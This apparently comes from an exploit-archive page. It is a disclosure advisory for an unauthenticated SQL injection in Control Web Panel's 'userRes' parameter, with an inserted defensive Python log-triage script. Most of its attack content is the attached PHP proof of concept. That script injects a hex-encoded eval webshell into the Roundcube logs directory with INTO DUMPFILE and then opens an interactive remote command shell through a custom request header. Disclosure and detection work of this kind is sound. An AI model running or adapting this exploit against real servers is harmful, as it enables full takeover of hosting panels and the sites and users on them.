## https://sploitus.com/exploit?id=PACKETSTORM:224887
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
[-] Software Link:
https://control-webpanel.com
[-] Affected Versions:
Version 0.9.8.1224 and prior versions.
[-] Vulnerability Description:
User input passed through the "userRes" POST parameter to
https://[CWP_Host]:2083/[CWP_Username]/
is not properly sanitized before being used to construct an SQL query. This
can be exploited by remote, unauthenticated attackers to carry out (blind)
SQL Injection attacks.
Successful exploitation of this vulnerability requires the attacker to know
or correctly guess the username of a valid non-root account on the affected
CWP instance.
NOTE: successful exploitation allows an unauthenticated attacker to execute
arbitrary SQL queries with the privileges of the MySQL root user. Because
this account possesses the global FILE privilege, the vulnerability can be
leveraged to write arbitrary files to locations writable by the MySQL server
process using MySQL's file output capabilities (e.g., SELECT ... INTO
DUMPFILE), provided the server's secure_file_priv setting does not restrict
writes to the target path. By writing a malicious PHP payload to the
web-accessible /usr/local/cwpsrv/var/services/roundcube/logs/ directory
(reachable as https://[CWP_Host]:2031/roundcube/logs/), an attacker can
execute arbitrary PHP code remotely, resulting in full Remote Code Execution
(RCE) on the affected CWP instance with the privileges of the 'cwpsvc'
account.
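As an added triage example (not part of the advisory or of the attached PoC), the following Python script looks for the two artefacts this exploitation chain leaves on a CWP host: requests for .php files under /roundcube/logs/ in the web server access log, and .php files present on disk in the Roundcube logs directory. The POST body carrying the userRes injection is not written to an access log, so POSTs to /<username>/ are only reported as candidates and correlated by source address with the webshell requests. The combined-style access log format and the sample log lines are assumptions and constructed data; CWP's real log locations and format are not described on this page, and the port 2083 and 2031 services may log to separate files that you would concatenate before running this.

```python
"""Post-exploitation triage for the CWP userRes SQLi / webshell chain (CVE-2026-57517)."""
import os
import re
import tempfile

# Web-accessible directory the PoC drops its webshell into (path from the advisory).
ROUNDCUBE_LOGS = "/usr/local/cwpsrv/var/services/roundcube/logs"

# Combined log format is an assumption; adapt the regex to the actual CWP log layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The PoC fetches its dropped file as /roundcube/logs/<uniqid>.php (served on port 2031).
WEBSHELL_PATH_RE = re.compile(r"^/roundcube/logs/[^/]+\.php$")


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webshell_requests(lines):
    """Return (ip, ts, path, status) for every request to a .php file under /roundcube/logs/.
    That directory only ever holds Roundcube log files, so any PHP request there is
    suspicious regardless of status (a 404 still shows someone probing for a dropped shell)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and WEBSHELL_PATH_RE.match(rec["path"].split("?", 1)[0]):
            hits.append((rec["ip"], rec["ts"], rec["path"], int(rec["status"])))
    return hits


def find_candidate_injections(lines, known_users):
    """POST /<user>/ is the injection request. The body is not logged, so these are only
    candidates; correlate them with webshell hits by source IP."""
    cands = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        parts = rec["path"].split("?", 1)[0].strip("/").split("/")
        if len(parts) == 1 and parts[0] in known_users:
            cands.append((rec["ip"], rec["ts"], parts[0]))
    return cands


def find_dropped_php(directory):
    """List *.php files in the Roundcube logs directory; a clean host has none."""
    try:
        names = os.listdir(directory)
    except FileNotFoundError:
        return []
    return sorted(n for n in names if n.lower().endswith(".php"))


def triage(lines, known_users, directory=ROUNDCUBE_LOGS):
    shell_hits = find_webshell_requests(lines)
    injections = find_candidate_injections(lines, known_users)
    # High confidence: one source both POSTed to a user endpoint and fetched a .php under logs/.
    correlated = sorted({c[0] for c in injections} & {h[0] for h in shell_hits})
    return {
        "webshell_requests": shell_hits,
        "injection_candidates": injections,
        "correlated_sources": correlated,
        "dropped_php_files": find_dropped_php(directory),
    }


# Constructed sample log lines (not real CWP logs) mirroring the PoC's two-request sequence.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jul/2026:10:15:02 +0000] "POST /bob/ HTTP/1.1" 200 5123 "-" "curl/8.5.0"
203.0.113.5 - - [01/Jul/2026:10:15:03 +0000] "GET /roundcube/logs/66a1b2c3d4e5f.php HTTP/1.1" 200 87 "-" "curl/8.5.0"
198.51.100.7 - - [01/Jul/2026:10:16:00 +0000] "GET /bob/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jul/2026:10:16:30 +0000] "GET /roundcube/logs/errors.log HTTP/1.1" 403 12 "-" "Mozilla/5.0"
192.0.2.9 - - [01/Jul/2026:10:17:00 +0000] "POST /bob/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
""".splitlines()


def demo():
    """Run the triage against a temporary directory standing in for ROUNDCUBE_LOGS, so the
    script runs on any machine. On a real CWP host call triage(lines, users) directly."""
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, "errors.log"), "w").close()
        open(os.path.join(d, "66a1b2c3d4e5f.php"), "w").close()  # simulated dropped shell
        return triage(SAMPLE_LOG, {"bob"}, d)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Any .php file reported from the logs directory should be preserved for forensics, not just deleted; the PoC's shell is reached through a single custom request header, so the access log alone will not show the commands that were run through it.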
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-57517.php
[-] Solution:
Upgrade to version 0.9.8.1225 or later.
[-] Disclosure Timeline:
[XX/YY/2025] - Vulnerability discovered
[06/05/2026] - Version 0.9.8.1225 released, issue fixed by the vendor
[26/06/2026] - CVE identifier requested
[26/06/2026] - CVE identifier assigned
[01/07/2026] - Public disclosure
[-] CVE Reference:
CVE-2026-57517 has been assigned to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
--- packet storm attached poc ---
<?php
/*
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://control-webpanel.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only.    |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "+-----------------------------------------------------------------------+\n";
print "| Control Web Panel <= 0.9.8.1224 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 3)
{
    print "\nUsage......: php $argv[0] <Hostname/IP> <Username>\n";
    print "\nExample....: php $argv[0] 127.0.0.1 egix";
    print "\nExample....: php $argv[0] cwp.victim.com bob\n\n";
    die();
}

// Encode the payload as a MySQL hex literal (0x...) so it contains no quotes
// that would break out of the injected string context.
function hex_enc($input)
{
    $encoded = "";
    for ($i = 0; $i < strlen($input); $i++)
        $encoded .= sprintf("%02x", ord($input[$i]));
    return "0x{$encoded}";
}

$ch = curl_init();
// Stage 1 target: the user panel on port 2083, keyed by a valid non-root username.
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");

print "\n[+] Injecting PHP webshell\n";

$sh_fname = uniqid() . ".php";
// The webshell evals whatever base64 arrives in a custom "C:" request header.
$phpshell = hex_enc("<?php eval(base64_decode(\$_SERVER['HTTP_C'])); ?>");
// Close the double-quoted string, UNION a 13-column row whose second column is
// the shell, write that row into the web-accessible Roundcube logs directory
// with INTO DUMPFILE (requires the FILE privilege), and comment out the rest
// of the original query.
$injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#";

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection]));
curl_exec($ch);

print "[+] Executing PHP webshell\n";

// Stage 2: the dropped file is served by the webmail service on port 2031.
$phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';";
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}");
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
    print "\ncwp-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
    preg_match("/___CMD___(.*)___CMD___/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}